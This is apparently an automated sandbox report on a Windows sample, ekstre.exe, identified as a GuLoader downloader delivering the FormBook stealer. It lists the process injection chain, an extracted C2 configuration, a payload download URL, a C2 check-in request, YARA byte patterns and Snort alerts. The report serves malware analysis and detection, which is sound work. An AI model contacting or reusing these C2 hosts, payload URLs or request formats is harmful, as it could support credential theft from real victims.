Edit tour

Windows Analysis Report
ekstre.exe

Overview

General Information

Sample Name:	ekstre.exe
Analysis ID:	838028
MD5:	9382db91f2e5799a51da843a33e3e2fa
SHA1:	d790d2370fb485d5f659bb2d859239d662e61d97
SHA256:	9a24f59f2af8bc6f278f8ad8d8e9664687deef8ac0a387ea576a9d1e84837fc7
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect Any.run

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

ekstre.exe (PID: 1600 cmdline: C:\Users\user\Desktop\ekstre.exe MD5: 9382DB91F2E5799A51DA843A33E3E2FA)

ekstre.exe (PID: 3348 cmdline: C:\Users\user\Desktop\ekstre.exe MD5: 9382DB91F2E5799A51DA843A33E3E2FA)

explorer.exe (PID: 4744 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

control.exe (PID: 4716 cmdline: C:\Windows\SysWOW64\control.exe MD5: 4DBD69D4C9DA5AAAC731F518EF8EBEA0)

cmd.exe (PID: 9952 cmdline: /c del "C:\Users\user\Desktop\ekstre.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 9960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1227114587.0000000003769000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.5855696363.000000000A7ED000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xb52:$a2: pass 0xb58:$a3: email 0xb5f:$a4: login 0xb66:$a5: signin 0xb77:$a6: persistent 0xd4a:$r1: C:\Users\user\AppData\Roaming\60PBO7E5\60Plog.ini
00000000.00000002.1228563483.00000000081F9000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: ekstre.exe PID: 1600	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: ekstre.exe PID: 3348	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf1c79:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.control.exe.2f2b960.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.control.exe.2f2b960.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.control.exe.2f2b960.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1b44d9:$sqlite3step: 68 34 1C 7B E1 0x1b45ec:$sqlite3step: 68 34 1C 7B E1 0x1b4508:$sqlite3text: 68 38 2A 90 C5 0x1b462d:$sqlite3text: 68 38 2A 90 C5 0x1b451b:$sqlite3blob: 68 53 D8 7F 8C 0x1b4643:$sqlite3blob: 68 53 D8 7F 8C
4.2.control.exe.2f2b960.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1a55a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1a5812:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1b1345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1b0e31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1b1447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1b15bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1a622a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1b00ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1a6f23:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b75b7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b85ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.control.exe.2f2b960.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1a1ef1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1b8850:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1a665f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1b1547:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.54.117.212

Timestamp:	192.168.11.20198.54.117.21249839802031412 03/30/23-14:26:23.800246
SID:	2031412
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.54.117.212

Timestamp:	192.168.11.20198.54.117.21249839802031449 03/30/23-14:26:23.800246
SID:	2031449
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic .bin download from Dotted Quad - Source IP: 192.168.11.20 - Destination IP: 34.138.169.8

Timestamp:	192.168.11.2034.138.169.849790802018752 03/30/23-14:19:42.629466
SID:	2018752
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.54.117.212

Timestamp:	192.168.11.20198.54.117.21249839802031453 03/30/23-14:26:23.800246
SID:	2031453
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ekstre.exe	Virustotal: Detection: 42%			Perma Link
Source: ekstre.exe	ReversingLabs: Detection: 32%

Yara detected FormBook

Source: Yara match	File source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.anotherworldrecord.com/mi94/?iN64=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&4hKt-j=ZVzPwN	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: ekstre.exe

Joe Sandbox ML: detected

Source: 4.2.control.exe.2f2b960.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.explorer.exe.1428f840.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.control.exe.51cf840.4.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Source: ekstre.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ekstre.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Apache License 2.0.txt

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Portgrave\Cybersex\forlistes\Protrudes

Jump to behavior

Source: ekstre.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-core-console-l1-2-0.pdb source: ekstre.exe, 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmp, ekstre.exe, 00000000.00000002.1225423801.0000000002B81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: ekstre.exe, 00000002.00000002.1368334017.0000000006954000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: control.exe
Source:	Binary string: control.pdbUGP source: ekstre.exe, 00000002.00000002.1368334017.0000000006954000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Windows\SysWOW64\control.exe

Code function: 4x nop then pop ebx

4_2_02B17B20

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 67.21.93.229 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.145.79 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 212.32.237.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 112.196.98.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.132.157.81 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.186.51 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.33.123.34 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.149.128.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.216 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49790 -> 34.138.169.8:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 198.54.117.212:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.3ay82.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.crosswalkconsulting.co.uk/mi94/

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
